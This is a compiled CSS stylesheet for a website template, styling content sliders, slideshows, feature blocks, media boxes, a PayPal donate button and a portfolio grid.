.g-content-pro, .g-content-pro-slider, .g-content-pro-slideset {
  text-align: center;
}
.g-content-pro.g-pullup, .g-content-pro-slider.g-pullup, .g-content-pro-slideset.g-pullup {
  margin-top: -9.2505rem;
  position: relative;
  z-index: 21;
}
.g-content-pro.g-pullup .g-content-pro-item, .g-content-pro-slider.g-pullup .g-content-pro-item, .g-content-pro-slideset.g-pullup .g-content-pro-item {
  border: none;
}
.g-content-pro.gutter-disabled .g-content-pro-item, .g-content-pro-slider.gutter-disabled .g-content-pro-item, .g-content-pro-slideset.gutter-disabled .g-content-pro-item {
  border: none;
}
.g-content-pro.gutter-disabled .uk-slideset, .g-content-pro-slider.gutter-disabled .uk-slideset, .g-content-pro-slideset.gutter-disabled .uk-slideset {
  margin-left: 0;
}
.g-content-pro.gutter-disabled .uk-slideset.uk-grid > *, .g-content-pro-slider.gutter-disabled .uk-slideset.uk-grid > *, .g-content-pro-slideset.gutter-disabled .uk-slideset.uk-grid > * {
  padding-left: 0;
}
.g-content-pro .g-content, .g-content-pro-slider .g-content, .g-content-pro-slideset .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
.g-content-pro .g-content-pro-item, .g-content-pro-slider .g-content-pro-item, .g-content-pro-slideset .g-content-pro-item {
  border: 1px solid #dddddd;
}
@media only all and (max-width: 47.99rem) {
  .g-content-pro .g-content-pro-item, .g-content-pro-slider .g-content-pro-item, .g-content-pro-slideset .g-content-pro-item {
    margin-bottom: 3.126rem;
  }
  .g-content-pro .g-content-pro-item:last-child, .g-content-pro-slider .g-content-pro-item:last-child, .g-content-pro-slideset .g-content-pro-item:last-child {
    margin-bottom: 0;
  }
}
.g-content-pro .g-content-pro-image > a, .g-content-pro-slider .g-content-pro-image > a, .g-content-pro-slideset .g-content-pro-image > a {
  display: block;
}
.g-content-pro .g-content-pro-image img, .g-content-pro-slider .g-content-pro-image img, .g-content-pro-slideset .g-content-pro-image img {
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
}
.g-content-pro .g-info-container, .g-content-pro-slider .g-info-container, .g-content-pro-slideset .g-info-container {
  padding: 20px;
  background: #ffffff;
}
.g-content-pro p, .g-content-pro-slider p, .g-content-pro-slideset p {
  margin: 0;
}
.g-content-pro .g-content-pro-title, .g-content-pro-slider .g-content-pro-title, .g-content-pro-slideset .g-content-pro-title {
  margin: 0;
}
.g-content-pro .g-content-pro-title a, .g-content-pro-slider .g-content-pro-title a, .g-content-pro-slideset .g-content-pro-title a {
  color: #282828;
}
.g-content-pro .g-content-pro-title a:hover, .g-content-pro-slider .g-content-pro-title a:hover, .g-content-pro-slideset .g-content-pro-title a:hover {
  color: #4f953b;
}
.g-content-pro .g-content-pro-desc, .g-content-pro-slider .g-content-pro-desc, .g-content-pro-slideset .g-content-pro-desc {
  margin-top: 0.4rem;
}
.g-content-pro .g-info-container-style2.uk-overlay-panel, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel {
  padding: 15px;
}
.g-content-pro .g-info-container-style2.uk-overlay-panel p, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel p, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel p {
  margin-top: 5px;
}
.g-content-pro .g-info-container-style2.uk-overlay-panel a, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel a, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel a {
  color: #ffffff;
}
.g-content-pro .g-info-container-style2.uk-overlay-panel a:hover, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel a:hover, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel a:hover {
  color: #4f953b;
}
.g-content-pro .g-info-container-style2 .g-content-pro-special, .g-content-pro .g-info-container-style2 .g-item-details, .g-content-pro-slider .g-info-container-style2 .g-content-pro-special, .g-content-pro-slider .g-info-container-style2 .g-item-details, .g-content-pro-slideset .g-info-container-style2 .g-content-pro-special, .g-content-pro-slideset .g-info-container-style2 .g-item-details {
  color: #eee;
}
.g-content-pro .g-content-pro-special, .g-content-pro-slider .g-content-pro-special, .g-content-pro-slideset .g-content-pro-special {
  color: #c8c8c8;
  font-style: italic;
  float: left;
}
@media only all and (max-width: 30rem) {
  .g-content-pro .g-content-pro-special, .g-content-pro-slider .g-content-pro-special, .g-content-pro-slideset .g-content-pro-special {
    float: none;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-content-pro .g-content-pro-special, .g-content-pro-slider .g-content-pro-special, .g-content-pro-slideset .g-content-pro-special {
    float: none;
  }
}
.g-content-pro .g-content-pro-special i, .g-content-pro-slider .g-content-pro-special i, .g-content-pro-slideset .g-content-pro-special i {
  margin-right: 5px;
}
.g-content-pro .g-content-pro-link, .g-content-pro-slider .g-content-pro-link, .g-content-pro-slideset .g-content-pro-link {
  float: right;
  font-style: italic;
}
.g-content-pro .g-content-pro-link i, .g-content-pro-slider .g-content-pro-link i, .g-content-pro-slideset .g-content-pro-link i {
  margin-left: 10px;
}
@media only all and (max-width: 30rem) {
  .g-content-pro .g-content-pro-link, .g-content-pro-slider .g-content-pro-link, .g-content-pro-slideset .g-content-pro-link {
    float: none;
    margin-top: 5px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-content-pro .g-content-pro-link, .g-content-pro-slider .g-content-pro-link, .g-content-pro-slideset .g-content-pro-link {
    float: none;
    margin-top: 5px;
  }
}
.g-content-pro .no-special .g-content-pro-link, .g-content-pro-slider .no-special .g-content-pro-link, .g-content-pro-slideset .no-special .g-content-pro-link {
  float: none;
}
.g-content-pro .no-link .g-content-pro-special, .g-content-pro-slider .no-link .g-content-pro-special, .g-content-pro-slideset .no-link .g-content-pro-special {
  float: none;
}
.g-content-pro .g-bottom-info, .g-content-pro-slider .g-bottom-info, .g-content-pro-slideset .g-bottom-info {
  margin-top: 15px;
}
.g-content-pro .g-item-details, .g-content-pro-slider .g-item-details, .g-content-pro-slideset .g-item-details {
  margin-top: 0.4rem;
  font-size: 90%;
  color: #c8c8c8;
}
.g-content-pro .g-item-details .date i, .g-content-pro-slider .g-item-details .date i, .g-content-pro-slideset .g-item-details .date i {
  margin-right: 5px;
}
.g-content-pro.style3 .g-info-container-style2, .g-content-pro-slider.style3 .g-info-container-style2, .g-content-pro-slideset.style3 .g-info-container-style2 {
  background: -webkit-linear-gradient(top, rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%);
  background: linear-gradient(to bottom, rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%);
  padding: 20px;
}
.g-content-pro.style3 .g-info-container-style2 a, .g-content-pro-slider.style3 .g-info-container-style2 a, .g-content-pro-slideset.style3 .g-info-container-style2 a {
  color: #ffffff;
}
.g-content-pro.style3 .g-info-container-style2 a:hover, .g-content-pro-slider.style3 .g-info-container-style2 a:hover, .g-content-pro-slideset.style3 .g-info-container-style2 a:hover {
  color: #ffffff;
  text-decoration: underline;
}
.g-content-pro.style3 .g-content-pro-image .uk-overlay img, .g-content-pro-slider.style3 .g-content-pro-image .uk-overlay img, .g-content-pro-slideset.style3 .g-content-pro-image .uk-overlay img {
  -webkit-transition: all 1s;
  -moz-transition: all 1s;
  transition: all 1s;
}
.g-content-pro.style3 .g-content-pro-image:hover .uk-overlay img, .g-content-pro-slider.style3 .g-content-pro-image:hover .uk-overlay img, .g-content-pro-slideset.style3 .g-content-pro-image:hover .uk-overlay img {
  -webkit-transform: scale(1.15);
  -moz-transform: scale(1.15);
  -ms-transform: scale(1.15);
  -o-transform: scale(1.15);
  transform: scale(1.15);
}
.g-content-pro:not(.gutter-disabled) {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
.g-content-pro:not(.gutter-disabled) > .g-grid {
  margin-bottom: 1.876rem;
}
.g-content-pro:not(.gutter-disabled) > .g-grid:last-child {
  margin-bottom: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-content-pro:not(.gutter-disabled) > .g-grid:last-child > .g-block:last-child .g-content-pro-item {
    margin-bottom: 0 !important;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-content-pro:not(.gutter-disabled) > .g-grid {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-content-pro:not(.gutter-disabled) .g-content-pro-item {
    margin-bottom: 1.876rem !important;
  }
}
.g-content-pro, .g-content-pro-slider, .g-content-pro-slideset {
  text-align: center;
}
.g-content-pro.g-pullup, .g-content-pro-slider.g-pullup, .g-content-pro-slideset.g-pullup {
  margin-top: -9.2505rem;
  position: relative;
  z-index: 21;
}
.g-content-pro.g-pullup .g-content-pro-item, .g-content-pro-slider.g-pullup .g-content-pro-item, .g-content-pro-slideset.g-pullup .g-content-pro-item {
  border: none;
}
.g-content-pro.gutter-disabled .g-content-pro-item, .g-content-pro-slider.gutter-disabled .g-content-pro-item, .g-content-pro-slideset.gutter-disabled .g-content-pro-item {
  border: none;
}
.g-content-pro.gutter-disabled .uk-slideset, .g-content-pro-slider.gutter-disabled .uk-slideset, .g-content-pro-slideset.gutter-disabled .uk-slideset {
  margin-left: 0;
}
.g-content-pro.gutter-disabled .uk-slideset.uk-grid > *, .g-content-pro-slider.gutter-disabled .uk-slideset.uk-grid > *, .g-content-pro-slideset.gutter-disabled .uk-slideset.uk-grid > * {
  padding-left: 0;
}
.g-content-pro .g-content, .g-content-pro-slider .g-content, .g-content-pro-slideset .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
.g-content-pro .g-content-pro-item, .g-content-pro-slider .g-content-pro-item, .g-content-pro-slideset .g-content-pro-item {
  border: 1px solid #dddddd;
  width: 100%;
}
@media only all and (max-width: 47.99rem) {
  .g-content-pro .g-content-pro-item, .g-content-pro-slider .g-content-pro-item, .g-content-pro-slideset .g-content-pro-item {
    margin-bottom: 3.126rem;
  }
  .g-content-pro .g-content-pro-item:last-child, .g-content-pro-slider .g-content-pro-item:last-child, .g-content-pro-slideset .g-content-pro-item:last-child {
    margin-bottom: 0;
  }
}
.g-content-pro .g-content-pro-image, .g-content-pro-slider .g-content-pro-image, .g-content-pro-slideset .g-content-pro-image {
  width: 100%;
  background-position: center;
  background-size: cover;
}
.g-content-pro .g-content-pro-image > a, .g-content-pro-slider .g-content-pro-image > a, .g-content-pro-slideset .g-content-pro-image > a {
  display: block;
  width: 100%;
  height: 100%;
}
.g-content-pro .g-content-pro-image img, .g-content-pro-slider .g-content-pro-image img, .g-content-pro-slideset .g-content-pro-image img {
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
}
.g-content-pro .g-info-container, .g-content-pro-slider .g-info-container, .g-content-pro-slideset .g-info-container {
  padding: 20px;
  background: #ffffff;
}
.g-content-pro p, .g-content-pro-slider p, .g-content-pro-slideset p {
  margin: 0;
}
.g-content-pro .g-content-pro-title, .g-content-pro-slider .g-content-pro-title, .g-content-pro-slideset .g-content-pro-title {
  margin: 0;
}
.g-content-pro .g-content-pro-title a, .g-content-pro-slider .g-content-pro-title a, .g-content-pro-slideset .g-content-pro-title a {
  color: #282828;
}
.g-content-pro .g-content-pro-title a:hover, .g-content-pro-slider .g-content-pro-title a:hover, .g-content-pro-slideset .g-content-pro-title a:hover {
  color: #4f953b;
}
.g-content-pro .g-content-pro-desc, .g-content-pro-slider .g-content-pro-desc, .g-content-pro-slideset .g-content-pro-desc {
  margin-top: 10px;
}
.g-content-pro .g-info-container-style2.uk-overlay-panel, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel {
  padding: 15px;
}
.g-content-pro .g-info-container-style2.uk-overlay-panel p, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel p, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel p {
  margin-top: 5px;
}
.g-content-pro .g-info-container-style2.uk-overlay-panel a, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel a, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel a {
  color: #ffffff;
}
.g-content-pro .g-info-container-style2.uk-overlay-panel a:hover, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel a:hover, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel a:hover {
  color: #4f953b;
}
.g-content-pro .g-info-container-style2 .g-article-details, .g-content-pro-slider .g-info-container-style2 .g-article-details, .g-content-pro-slideset .g-info-container-style2 .g-article-details {
  color: #eee;
}
.g-content-pro .g-article-details, .g-content-pro-slider .g-article-details, .g-content-pro-slideset .g-article-details {
  margin-top: 10px;
  font-size: 90%;
  color: #bbb;
}
.g-content-pro .g-article-details > span, .g-content-pro-slider .g-article-details > span, .g-content-pro-slideset .g-article-details > span {
  margin-right: 10px;
}
.g-content-pro .g-article-details > span:last-child, .g-content-pro-slider .g-article-details > span:last-child, .g-content-pro-slideset .g-article-details > span:last-child {
  margin-right: 0;
}
.g-content-pro .g-article-details > span i, .g-content-pro-slider .g-article-details > span i, .g-content-pro-slideset .g-article-details > span i {
  margin-right: 5px;
}
.g-content-pro .g-article-read-more, .g-content-pro-slider .g-article-read-more, .g-content-pro-slideset .g-article-read-more {
  margin-top: 15px;
}
.g-content-pro.style3 .g-info-container-style2, .g-content-pro-slider.style3 .g-info-container-style2, .g-content-pro-slideset.style3 .g-info-container-style2 {
  background: -webkit-linear-gradient(top, rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%);
  background: linear-gradient(to bottom, rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%);
  padding: 20px;
}
.g-content-pro.style3 .g-info-container-style2 a, .g-content-pro-slider.style3 .g-info-container-style2 a, .g-content-pro-slideset.style3 .g-info-container-style2 a {
  color: #ffffff;
}
.g-content-pro.style3 .g-info-container-style2 a:hover, .g-content-pro-slider.style3 .g-info-container-style2 a:hover, .g-content-pro-slideset.style3 .g-info-container-style2 a:hover {
  color: #ffffff;
  text-decoration: underline;
}
.g-content-pro.style3 .g-content-pro-image .uk-overlay img, .g-content-pro-slider.style3 .g-content-pro-image .uk-overlay img, .g-content-pro-slideset.style3 .g-content-pro-image .uk-overlay img {
  -webkit-transition: all 1s;
  -moz-transition: all 1s;
  transition: all 1s;
}
.g-content-pro.style3 .g-content-pro-image:hover .uk-overlay img, .g-content-pro-slider.style3 .g-content-pro-image:hover .uk-overlay img, .g-content-pro-slideset.style3 .g-content-pro-image:hover .uk-overlay img {
  -webkit-transform: scale(1.15);
  -moz-transform: scale(1.15);
  -ms-transform: scale(1.15);
  -o-transform: scale(1.15);
  transform: scale(1.15);
}
.g-slideshow .uk-overlay-panel {
  padding: 25px;
}
@media only all and (max-width: 47.99rem) {
  .g-slideshow .uk-overlay-panel {
    padding: 15px;
  }
  .g-slideshow .uk-overlay-panel.uk-overlay-left {
    top: auto;
    bottom: 0;
    right: 0;
    width: 100%;
  }
  .g-slideshow .uk-overlay-panel.uk-overlay-right {
    top: auto;
    bottom: 0;
    left: 0;
    width: 100%;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-slideshow .uk-overlay-panel {
    padding: 15px;
  }
  .g-slideshow .uk-overlay-panel.uk-overlay-left {
    top: auto;
    bottom: 0;
    right: 0;
    width: 100%;
  }
  .g-slideshow .uk-overlay-panel.uk-overlay-right {
    top: auto;
    bottom: 0;
    left: 0;
    width: 100%;
  }
}
@media only all and (min-width: 60rem) and (max-width: 74.99rem) {
  .g-slideshow .uk-overlay-panel {
    padding: 15px;
  }
}
.g-slideshow .g-overlay-container {
  width: 75rem;
  margin-left: auto;
  margin-right: auto;
  padding-left: 25px !important;
  padding-right: 25px !important;
}
@media only all and (min-width: 60rem) and (max-width: 74.99rem) {
  .g-slideshow .g-overlay-container {
    width: 60rem;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-slideshow .g-overlay-container {
    width: 48rem;
  }
}
@media only all and (min-width: 30.01rem) and (max-width: 47.99rem) {
  .g-slideshow .g-overlay-container {
    width: 30rem;
  }
}
@media only all and (max-width: 30rem) {
  .g-slideshow .g-overlay-container {
    width: 100%;
  }
}
.g-slideshow .nav-visible .uk-slidenav {
  opacity: 1;
}
.g-slideshow .g-slideshow-title {
  margin: 0 0 15px;
  color: #ffffff !important;
}
@media only all and (max-width: 47.99rem) {
  .g-slideshow .g-slideshow-title {
    margin: 0;
    font-size: 1rem;
  }
}
.g-slideshow .g-slideshow-desc {
  margin: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-slideshow .g-slideshow-desc {
    display: none;
  }
}
.g-slideshow .g-slideshow-desc a:not(.button) {
  color: #4f953b;
}
.g-slideshow .g-slideshow-desc a:not(.button):hover {
  text-decoration: underline;
}
.g-slideshow .g-slideshow-buttons {
  margin: 25px 0 0;
}
@media only all and (max-width: 47.99rem) {
  .g-slideshow .g-slideshow-buttons {
    margin: 15px 0 0;
  }
}
.g-slideshow .g-slideshow-buttons .button {
  margin-right: 15px;
  border: 2px solid #4f953b;
  -webkit-transition: all 0.3s;
  -moz-transition: all 0.3s;
  transition: all 0.3s;
}
.g-slideshow .g-slideshow-buttons .button:hover {
  background: #5eb247;
  border-color: #5eb247;
}
.g-slideshow .g-slideshow-buttons .button:last-child {
  margin-right: 0;
}
.g-slideshow .g-slideshow-buttons .button > span {
  margin-right: 10px;
}
@media only all and (max-width: 47.99rem) {
  .g-slideshow .g-slideshow-buttons .button {
    display: block;
    margin-right: 0;
    margin-bottom: 15px;
  }
  .g-slideshow .g-slideshow-buttons .button:last-child {
    margin-bottom: 0;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-slideshow .g-slideshow-buttons .button {
    display: block;
    margin-right: 0;
    margin-bottom: 15px;
  }
  .g-slideshow .g-slideshow-buttons .button:last-child {
    margin-bottom: 0;
  }
}
.g-slideshow .g-slideshow-buttons .button.empty {
  background: none;
  border: 2px solid #4f953b;
  color: #4f953b;
}
.g-slideshow .g-slideshow-buttons .button.empty:hover {
  background: #4f953b;
  border-color: #4f953b;
  color: #ffffff;
}
.g-slideshow .uk-flex-center {
  text-align: center;
}
.g-slideshow .style2 {
  padding: 70px 0;
}
.g-slideshow .style2 .g-slideshow-title {
  padding: 15px 25px;
  background: #ffffff;
  color: #1a1a1a !important;
  font-size: 2rem;
  display: table;
  margin-bottom: 20px;
}
.g-slideshow .style2 .g-slideshow-desc {
  padding: 15px 20px;
  background: #1a1a1a;
  color: #ffffff !important;
  font-size: 1.2rem;
  display: table;
}
.g-slideshow .style2 .g-slideshow-buttons .button {
  font-size: 1.2rem;
}
.g-slideshow .style2 .g-slideshow-buttons .button.standard {
  background: #ffffff;
  border-color: #ffffff;
  color: #1a1a1a;
}
.g-slideshow .style2 .g-slideshow-buttons .button.standard:hover {
  background: #1a1a1a;
  border-color: #1a1a1a;
  color: #ffffff;
}
.g-slideshow .style2 .g-slideshow-buttons .button.empty {
  border-color: #ffffff;
  color: #ffffff;
}
.g-slideshow .style2 .g-slideshow-buttons .button.empty:hover {
  background: #1a1a1a;
  border-color: #1a1a1a;
  color: #ffffff;
}
.g-slideshow .style2.uk-flex-right .g-slideshow-title, .g-slideshow .style2.uk-flex-right .g-slideshow-desc {
  margin-left: auto;
}
.g-slideshow .style2.uk-flex-center .g-slideshow-title {
  margin: 0 auto 20px;
}
.g-slideshow .style2.uk-flex-center .g-slideshow-desc {
  margin: auto;
}
.g-slideshow .style3 .g-slideshow-title {
  font-size: 2rem;
}
@media only all and (max-width: 47.99rem) {
  .g-slideshow .style3 .g-slideshow-title {
    font-size: 1.2rem;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-slideshow .style3 .g-slideshow-title {
    font-size: 1.4rem;
  }
}
.g-slideshow .style3 .g-slideshow-desc {
  font-size: 17px;
  line-height: 30px;
}
.g-slideshow .dark-text .style3 .g-slideshow-title {
  color: #959595 !important;
}
.g-slideshow .dark-text .style3 .g-slideshow-desc {
  color: #959595;
}
.g-slideshow .uk-dotnav {
  margin: 0 0 35px;
}
.g-slideshow .g-slideshow-item iframe {
  pointer-events: auto !important;
}
.g-slideshow .slideshow-caption.uk-overlay-background {
  padding: 25px;
}
.g-slideshow .uk-overlay-left-short {
  -webkit-transform: translateX(-10%);
  -moz-transform: translateX(-10%);
  -ms-transform: translateX(-10%);
  -o-transform: translateX(-10%);
  transform: translateX(-10%);
}
.g-slideshow .uk-overlay-right-short {
  -webkit-transform: translateX(10%);
  -moz-transform: translateX(10%);
  -ms-transform: translateX(10%);
  -o-transform: translateX(10%);
  transform: translateX(10%);
}
.g-slideshow .uk-overlay-top-short {
  -webkit-transform: translateY(-10%);
  -moz-transform: translateY(-10%);
  -ms-transform: translateY(-10%);
  -o-transform: translateY(-10%);
  transform: translateY(-10%);
}
.g-slideshow .uk-overlay-bottom-short {
  -webkit-transform: translateY(10%);
  -moz-transform: translateY(10%);
  -ms-transform: translateY(10%);
  -o-transform: translateY(10%);
  transform: translateY(10%);
}
.g-slideshow .uk-overlay-scale {
  -webkit-transform: scale(0.8);
  -moz-transform: scale(0.8);
  -ms-transform: scale(0.8);
  -o-transform: scale(0.8);
  transform: scale(0.8);
}
.g-slideshow .uk-overlay-left-short, .g-slideshow .uk-overlay-right-short, .g-slideshow .uk-overlay-top-short, .g-slideshow .uk-overlay-bottom-short {
  -webkit-transition-duration: 0.5s;
  -moz-transition-duration: 0.5s;
  transition-duration: 0.5s;
}
.g-slideshow .uk-overlay-active .uk-active .uk-overlay-scale {
  -webkit-transform: scale(1);
  -moz-transform: scale(1);
  -ms-transform: scale(1);
  -o-transform: scale(1);
  transform: scale(1);
}
.g-slideshow audio, .g-slideshow canvas, .g-slideshow video {
  display: block;
}
#g-fullwidth .g-slideshow .g-content, .g-flushed .g-slideshow .g-content {
  margin: 0.625rem;
  padding: 0.938rem;
}
.g-main-feature {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
.g-main-feature .g-main-feature-left .g-content {
  margin: 0 0.625rem 0 0;
  padding-top: 0;
  padding-bottom: 0;
}
.g-main-feature .g-main-feature-right .g-content {
  margin: 0 0 0 0.625rem;
  padding-top: 0;
  padding-bottom: 0;
}
.g-main-feature .g-main-feature-right.align-right {
  text-align: right;
}
.g-main-feature .g-main-feature-title {
  margin-top: -5px;
}
.g-main-feature .image-bottom {
  margin-bottom: -4.563rem;
}
.g-main-feature .g-main-feature-link {
  margin-top: 5px;
}
.g-main-feature .g-main-feature-link i {
  margin-right: 10px;
}
.g-main-feature .g-main-feature-link.g-button2 {
  margin-left: 25px;
}
@media only all and (max-width: 30rem) {
  .g-main-feature .g-main-feature-link.g-button2 {
    margin-left: 0;
  }
}
@media only all and (max-width: 30rem) {
  .g-main-feature .g-main-feature-link {
    display: block;
  }
}
.g-main-feature .g-main-feature-desc i {
  margin-right: 8px;
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-main-feature .image-block {
    display: none;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-main-feature .image-block {
    display: none;
  }
}
.g-media-box .g-grid {
  margin-bottom: 1.25rem;
}
.g-media-box .g-grid:last-child {
  margin-bottom: 0;
}
.g-media-box .g-grid .g-block {
  margin-right: 1.25rem;
}
@media only all and (max-width: 47.99rem) {
  .g-media-box .g-grid .g-block {
    margin-right: 0;
    margin-bottom: 1.25rem;
  }
}
.g-media-box .g-grid .g-block:last-child {
  margin-right: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-media-box .g-grid .g-block:last-child {
    margin-bottom: 0;
  }
}
.g-media-box .g-media-box-item .g-media-box-content {
  background: #ffffff;
  padding: 2rem;
  border: 1px solid #dddddd;
}
.g-media-box .g-media-box-item .g-media-box-content .g-media-box-links .button-media {
  color: #959595;
  background: transparent;
  border: 1px solid #dddddd;
  width: 3rem;
  height: 3rem;
  line-height: 3rem;
  text-align: center;
  cursor: pointer;
  display: inline-block;
  -webkit-transition: 0.2s;
  -moz-transition: 0.2s;
  transition: 0.2s;
}
.g-media-box .g-media-box-item .g-media-box-content .g-media-box-links .button-media:hover {
  color: #ffffff;
  background: #4f953b;
  border-color: #4f953b;
}
@media only all and (max-width: 47.99rem) {
  .g-media-box .g-media-box-item .g-media-box-content .g-media-box-links .button-media {
    width: 2.5rem;
    height: 2.5rem;
    line-height: 1.5rem;
    padding: 0.5rem;
  }
}
.g-media-box .g-media-box-item .g-media-box-content .g-media-box-links .g-media-box-play {
  position: absolute;
  margin-top: -2.5rem;
}
.g-media-box .g-media-box-item .g-media-box-content .g-media-box-links .g-item-text {
  visibility: hidden;
  position: absolute;
  width: 0;
  height: 0;
}
.g-media-box .g-media-box-item .g-media-box-content .g-media-box-desc {
  margin: 1.5rem 0;
  padding-bottom: 1.5rem;
  border-bottom: 1px solid #dddddd;
}
.g-media-box .g-media-box-item .g-media-box-content .g-media-box-special1, .g-media-box .g-media-box-item .g-media-box-content .g-media-box-special2 {
  margin: 0;
}
.g-paypaldonate {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
  text-align: center;
}
.g-paypaldonate .g-paypaldonate-form form {
  margin: 0;
}
.g-paypaldonate .g-paypaldonate-form .g-paypaldonate-button .g-paypaldonate-icon {
  padding: 1.5rem;
  background: rgba(0, 0, 0, 0.2);
}
.g-paypaldonate .g-paypaldonate-form .g-paypaldonate-button input[type="submit"] {
  background: transparent;
  padding: 1.25rem;
  margin-top: -3px;
}
.g-paypaldonate .g-paypaldonate-form .g-paypaldonate-button.button {
  padding: 0;
  border: 0;
}
.g-portfolio .g-portfolio-filter {
  margin-bottom: 30px;
}
.g-portfolio .g-portfolio-filter.uk-subnav > * > * {
  color: #959595;
}
.g-portfolio .g-portfolio-filter.uk-subnav-pill > * > * {
  padding: 3px 8px;
  border: 1px solid #dddddd;
  background: #ffffff;
  -webkit-transition: all, 0.2s;
  -moz-transition: all, 0.2s;
  transition: all, 0.2s;
}
.g-portfolio .g-portfolio-filter.uk-subnav-pill > * > *:focus, .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > *:hover {
  background: #ffffff;
  box-shadow: none;
  border: 1px solid #4f953b;
  color: #4f953b;
}
.g-portfolio .g-portfolio-filter .uk-active > a {
  background: #ffffff;
  border: 1px solid #4f953b;
  color: #4f953b;
  box-shadow: none;
}
.g-portfolio .g-portfolio-item {
  border: 1px solid #dddddd;
}
.g-portfolio.gutter-disabled .g-portfolio-item {
  border: none;
}
.g-portfolio .g-portfolio-image > a {
  display: block;
}
.g-portfolio .g-info-container {
  padding: 20px;
  background: #ffffff;
}
.g-portfolio p {
  margin: 0;
}
.g-portfolio .g-portfolio-title {
  margin: 0;
}
.g-portfolio .g-portfolio-title a {
  color: #282828;
}
.g-portfolio .g-portfolio-title a:hover {
  color: #4f953b;
}
.g-portfolio .g-item-details {
  margin-top: 10px;
  font-size: 90%;
  color: #c8c8c8;
  font-style: italic;
}
.g-portfolio .g-item-details i {
  margin-right: 5px;
}
.g-portfolio .g-portfolio-desc {
  margin-top: 10px;
}
.g-portfolio .g-info-container-style2.uk-overlay-panel {
  padding: 15px;
}
.g-portfolio .g-info-container-style2.uk-overlay-panel p {
  margin-top: 5px;
}
.g-portfolio .g-info-container-style2.uk-overlay-panel a {
  color: #ffffff;
}
.g-portfolio .g-info-container-style2.uk-overlay-panel a:hover {
  color: #4f953b;
}
.g-portfolio .g-info-container-style2 .g-portfolio-special, .g-portfolio .g-info-container-style2 .g-item-details {
  color: #eee;
}
.g-portfolio .g-portfolio-special {
  color: #c8c8c8;
  font-style: italic;
  float: left;
}
@media only all and (max-width: 30rem) {
  .g-portfolio .g-portfolio-special {
    float: none;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-portfolio .g-portfolio-special {
    float: none;
  }
}
.g-portfolio .g-portfolio-special i {
  margin-right: 5px;
}
.g-portfolio .g-portfolio-link {
  float: right;
  font-style: italic;
}
.g-portfolio .g-portfolio-link i {
  margin-left: 10px;
}
@media only all and (max-width: 30rem) {
  .g-portfolio .g-portfolio-link {
    float: none;
    margin-top: 5px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-portfolio .g-portfolio-link {
    float: none;
    margin-top: 5px;
  }
}
.g-portfolio .no-special .g-portfolio-link {
  float: none;
}
.g-portfolio .no-link .g-portfolio-special {
  float: none;
}
.g-portfolio .g-bottom-info {
  margin-top: 15px;
}
.g-portfolio.style3 .g-info-container {
  position: absolute;
  visibility: hidden;
  z-index: 9;
  opacity: 0;
  border: 1px solid #dddddd;
  border-top: none;
  width: 100%;
  -webkit-transition: opacity 0.3s;
  -moz-transition: opacity 0.3s;
  transition: opacity 0.3s;
}
.g-portfolio.style3 .g-portfolio-item {
  border: none;
  position: relative;
}
.g-portfolio.style3 .g-portfolio-item:hover .g-info-container {
  visibility: visible;
  opacity: 1;
}
.g-portfolio.style4 .g-info-container-style2 {
  background: -webkit-linear-gradient(top, rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%);
  background: linear-gradient(to bottom, rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%);
  padding: 20px;
}
.g-portfolio.style4 .g-info-container-style2 a {
  color: #ffffff;
}
.g-portfolio.style4 .g-info-container-style2 a:hover {
  color: #ffffff;
  text-decoration: underline;
}
.g-portfolio.style4 .g-portfolio-image .uk-overlay img {
  -webkit-transition: all 1s;
  -moz-transition: all 1s;
  transition: all 1s;
}
